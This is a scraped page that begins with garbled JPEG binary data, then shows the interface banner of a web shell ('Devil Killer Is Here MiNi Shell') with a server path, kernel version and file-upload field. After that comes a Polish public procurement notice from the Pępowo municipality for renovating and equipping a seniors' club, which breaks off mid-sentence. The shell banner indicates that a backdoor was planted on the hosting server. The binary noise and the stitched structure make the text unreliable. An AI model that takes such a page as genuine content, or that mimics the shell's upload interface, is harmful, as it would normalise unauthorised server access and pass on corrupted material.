JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210805/0013877501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00138775 z dnia 2021-08-05</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Utworzenie i wyposażenie Klubu Seniora w Pępowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA PĘPOWO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 411050592</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Stanisławy Nadstawek 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pępowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-830</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">655736305</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@pepowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pepowo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zgodnie z ustawą z dnia 8 marca 1990 r. o samorządzie gminnym </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Utworzenie i wyposażenie Klubu Seniora w Pępowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c4224bfe-f5e5-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00138775</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003316/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Przebudowa z rozbudową budynku Gminnego Ośrodka Kultury w Pępowie wraz z montażem windy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pepowo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pepowo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Oferta,<br/>wniosek oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą<br/>zostać podpisane elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub podpisem<br/>osobistym. W procesie składania oferty, wniosku w tym przedmiotowych środków dowodowych na<br/>platformie, kwalifikowany podpis elektroniczny lub podpis zaufany lub podpis osobisty wykonawca<br/>składa bezpośrednio na dokumencie, który następnie przesyła do systemu. 2. Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U.<br/>z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na<br/>platforma zakupowa.pl, tj.:a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie<br/>mniejszej niż 512 kb/s,b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB<br/>Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows<br/>7, Mac Os x 10 4, Linux, lub ich nowsze wersje,c) zainstalowana dowolna przeglądarka internetowa, w<br/>przypadku Internet Explorer minimalnie wersja 10 0.,d) włączona obsługa JavaScript,e) zainstalowany<br/>program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,f) Szyfrowanie na<br/>platforma zakupowa.pl odbywa się za pomocą protokołu TLS 1.3.g) Oznaczenie czasu odbioru danych<br/>przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.3. Podpisy kwalifikowane<br/>wykorzystywane przez wykonawców do podpisywania wszelkich plików muszą spełniać<br/>“Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług<br/>zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014<br/>- od 1 lipca 2016 roku” W przypadku wykorzystania formatu podpisu XAdES zewnętrzny. Zamawiający<br/>wymaga dołączenia odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików podpisu<br/>w formacie XAdES.4. Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem<br/>dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy<br/>komunikacji wielkość pliku to maksymalnie 500 MB.5. Rozszerzenia plików wykorzystywanych przez<br/>wykonawców powinny być zgodne z “OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 9<br/>listopada 2017 r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie<br/>Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany<br/>informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”6. W<br/>celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między<br/>zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje,<br/>przekazywane są w formie elektronicznej za pośrednictwem platformazakupowa.pl i formularza „Wyślij<br/>wiadomość do zamawiającego”. W przypadku problemów technicznych związanych z obsługą<br/>platformazakupowa.pl Zamawiający dopuszcza kontakt przy użyciu poczty elektronicznej przetargi@pepowo.pl jako kanału pomocniczego w sytuacjach awaryjnych.6. Szczegółowe informacje<br/>techniczne i organizacyjne dot. korespondencji elektronicznej zawarto w rozdziale 6.5, 7 i 11 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z postanowieniami rozdziału 21 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z postanowieniami rozdziału 21 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WRG.271.6.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych dla zadania pn.: „Utworzenie i<br/>wyposażenie Klubu Seniora w Pępowie”.<br/>3.2. Zakres zamówienia obejmuje remont pomieszczeń Klubu Seniora w budynku Gminnego<br/>Ośrodka Kultury, Sportu i Aktywności Lokalnej w Pępowie, szczególności:<br/>a) roboty ogólnobudowlane: roboty rozbiórkowe, roboty murowe, wykonanie wylewki<br/>samopoziomującej, nowe wykładziny PVC, szpachlowanie, szlifowanie i malowanie ścian oraz<br/>sufitów, wymiana stolarki otworowej,<br/>b) wymianę instalacji elektrycznej wewnętrznej: linie kablowe, wewnętrzna instalacja<br/>oświetlenia, instalacja gniazd,<br/>c) wykonanie instalacji centralnego ogrzewania,<br/>d)instalacje wodno-kanalizacyjne i wentylacje.<br/>3.3. Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa,<br/>specyfikacja techniczna wykonania i odbioru robót oraz przedmiar robót i<br/>kosztorys ofertowy stanowiące Załączniki nr 8 - 10 do niniejszej SWZ.<br/>3.4. Zamawiający dopuszcza możliwość złożenia oferty równoważnej.<br/>3.5. Zamawiający dopuszcza możliwość złożenia oferty równoważnej, tj. zaproponowania<br/>rozwiązań równoważnych w stosunku do zaprojektowanych, z zastosowaniem tych samych standardów technicznych i jakościowych niezbędnych do prawidłowego funkcjonowania<br/>zamawianej inwestycji. Poprzez pojęcie materiałów równoważnych należy rozumieć materiały<br/>gwarantujące realizację robót zgodnie z projektem, oraz zapewniające uzyskanie parametrów<br/>technicznych, jakościowych i użytkowych nie gorszych niż założone w dokumentacji projektowej<br/>i specyfikacji technicznej wykonania i odbioru robót, a ponadto muszą to być materiały<br/>dopuszczone do obrotu i stosowania zgodnie z obowiązującym prawem.<br/>3.6. Ilekroć w niniejszej SWZ wraz z załącznikami przedmiot zamówienia jest opisany ze<br/>wskazaniem znaków towarowych, patentów lub pochodzenia, źródła lub szczególnego procesu,<br/>który charakteryzuje produkty lub usługi dostarczane przez konkretnego wykonawcę, to<br/>przyjmuje się, że każdemu takiemu wskazaniu towarzyszą wyrazy „lub równoważny”, a<br/>wskazanie ma charakter przykładowy.<br/>3.7. Zamawiający dopuszcza rozwiązania równoważne opisywanym przez odniesienie do norm,<br/>europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji<br/>technicznych, a odniesieniu takiemu towarzyszą wyrazy „lub równoważne”.<br/>3.8. Wykonawca, który powołuje się na rozwiązanie równoważne opisywane przez<br/>Zamawiającego, jest obowiązany wykazać, że oferowane przez niego materiały i urządzenia<br/>spełniają wymagania określone przez Zamawiającego.<br/>Brak wskazania w ofercie propozycji zastosowania rozwiązań równoważnych oznaczać będzie,<br/>że przedmiot zamówienia zostanie wykonany przy zastosowaniu materiałów przyjętych w<br/>dokumentacji technicznej.<br/>W sytuacji, gdy Wykonawca zamierza zastosować inne materiały i urządzenia niż podane w<br/>dokumentacji projektowej (materiały i urządzenia równoważne) winien dołączyć do oferty wykaz<br/>zawierający materiały i urządzenia zawarte w dokumentacji projektowej oraz podać ich<br/>równoważniki (nazwy materiałów i urządzeń zaproponowanych w ofercie). Do wykazu należy<br/>wówczas dołączyć stosowne dokumenty zawierające parametry techniczne zaproponowanych<br/>równoważnych materiałów i urządzeń.<br/>3.9. Zakres robót oraz odpowiedzialność Wykonawcy w zakresie objętym proponowaną ceną<br/>ofertową obejmuje także:<br/>- organizację i zabezpieczenie placu budowy, zaopatrzenie w media, opłacenie wszystkich<br/>wynikających z procesu budowlanego i używanego sprzętu opłat, jak<br/>również opłacenie niezbędnych badań koniecznych do przeprowadzenia procesu odbioru i<br/>uporządkowanie terenu po wykonaniu umowy,<br/>- zabezpieczenie terenu objętego robotami przed dostępem osób postronnych,<br/>- zorganizowanie i przeprowadzenie niezbędnych prób, pomiarów, badań i odbiorów oraz<br/>wykonanie dokumentacji powykonawczej;<br/>- wywóz materiałów porozbiórkowych nadających się do ponownego wbudowania w miejsce<br/>wskazane przez Zamawiającego, przy czym miejsce to będzie się mieścić w granicach<br/>administracyjnych gminy Pępowo,<br/>- ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/>przedmiotem zamówienia;<br/>- umieszczenie w widocznym miejscu tablicy informacyjnej oraz ogłoszenia zawierającego dane<br/>dotyczące bezpieczeństwa pracy i ochrony zdrowia – o ile dotyczy; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45262700-8 - Przebudowa budynków</p> <p class="mb-0">45432000-4 - Kładzenie i wykładanie podłóg, ścian i tapetowanie ścian</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie kierował się następującym<br/>kryterium:<br/>15.1.1. Cena 60%<br/>15.1.2. Termin gwarancji i rękojmi 40%<br/>Razem 100 % = 100 pkt<br/>15.2. Ranking ofert przy uwzględnieniu ww. kryteriów ustalony będzie w skali do 100 punktów, w<br/>następujący sposób:<br/>P = Pc + Pg<br/>P = punkty za ofertę<br/>Pc = punkty za cenę<br/>Pg = punkty za termin gwarancji i rękojmi<br/>Punktacja:<br/>-punkty za cenę:<br/>Pc -ilość punktów za cenę,<br/>Pc = 60 % = 60pkt<br/>Pc = (Cncb/Cbob) x 60pkt x 100%, gdzie:<br/>Cncb -cena najniższa brutto wśród ofert niepodlegających odrzuceniu,<br/>Cbob -cena brutto oferty badanej<br/>-punkty za termin gwarancji i rękojmi:<br/>Pg –ilość punktów za termin gwarancji i rękojmi<br/>Pg = 40 % = 40 pkt<br/>Punktacja za termin gwarancji i rękojmi –gwarancja i rękojmia obejmuje:<br/>- 60 miesięcy = 0 pkt x 100% = 0 pkt<br/>- 72 miesiące= 20 pkt x 100% =20 pkt<br/>- 84 miesiące= 40 pkt x 100% = 40 pkt<br/>Wykonawca wskazuje ewentualne zaoferowanie dłuższego terminu gwarancji i rękojmi w załączniku nr<br/>1 do SWZ –formularz oferty. Wykonawca chcący zaoferować wydłużony termin gwarancji i rękojmi<br/>wybiera odpowiedni punkt w formularzu oferty. Brak wpisu w formularzu oferty traktowany będzie jako<br/>oferowanie tylko i wyłącznie minimalnego 60 miesięcznego okresu gwarancji i rękojmi a Wykonawca<br/>otrzyma za kryterium gwarancji 0 pkt.<br/>15.3. Za najkorzystniejszą ofertę Zamawiający uzna ofertę z największą ilością punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki z<br/>art. 112 ust. 2 ustawy PZP, dotyczące:<br/>a) Zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie określa minimalnych poziomów zdolności w zakresie niniejszego warunku<br/>udziału w postępowaniu.<br/>b) Uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych<br/>przepisów.<br/>Zamawiający nie określa minimalnych poziomów zdolności w zakresie niniejszego warunku<br/>udziału w postępowaniu.<br/>c) Sytuacji ekonomicznej i finansowej<br/>Zamawiający nie określa minimalnych poziomów zdolności w zakresie niniejszego warunku<br/>udziału w postępowaniu.<br/>d) Zdolności technicznej lub zawodowej<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał co najmniej 1<br/>robotę o wartości minimum 150 000,00 zł brutto, polegającą na budowie, przebudowie lub<br/>remoncie budynku użyteczności publicznej w okresie ostatnich 5 lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>Ilekroć w SWIZ jest mowa o:<br/>- budynku użyteczności publicznej - należy przez to rozumieć budynek przeznaczony na<br/>potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty,<br/>szkolnictwa wyższego, nauki, wychowania, opieki zdrowotnej, społecznej lub socjalnej, obsługi<br/>bankowej, handlu, gastronomii, usług, w tym usług pocztowych lub telekomunikacyjnych,<br/>turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, oraz inny budynek przeznaczony do wykonywania podobnych<br/>funkcji; za budynek użyteczności publicznej uznaje się także budynek biurowy lub socjalny, [§ 3<br/>pkt. 4, 5 i 6 rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie<br/>warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. z 2019 r. ,<br/>poz. 1065 z późn. zm.)]., <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 108 ust. 1 oraz art. 109 ust. 1<br/>pkt. 4 ustawy PZP (pkt 5.2. oraz 5.3. niniejszej SWZ):<br/>a) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli<br/>odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do<br/>wykluczenia w oparciu o art. 109 ust. 1 pkt. 4 ustawy PZP sporządzonych nie wcześniej niż 3 miesiące<br/>przed jej złożeniem;<br/>b) oświadczenia o braku przynależności do tej samej grupy kapitałowej . w rozumieniu ustawy z dnia<br/>16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym<br/>wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w<br/>postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej zgodnie z załącznikiem Nr 5 do niniejszej SWZ<br/>6.4. Dokumenty podmiotów zagranicznych. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania<br/>poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 6.3.2. lit. a<br/>niniejszej SWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce<br/>zamieszkania, potwierdzające, odpowiednio że:<br/>6.4.1. nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub<br/>sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie<br/>znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w<br/>przepisach miejsca wszczęcia tej procedury – wystawiony nie wcześniej niż 3 miesiące przed upływem<br/>terminu składania ofert.<br/>Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się<br/>dokumentów, o których mowa w pkt 6.4.1., zastępuje się je odpowiednio w całości lub w części<br/>dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób<br/>uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone<br/>pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma<br/>przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym,<br/>notariuszem, organem samorządu 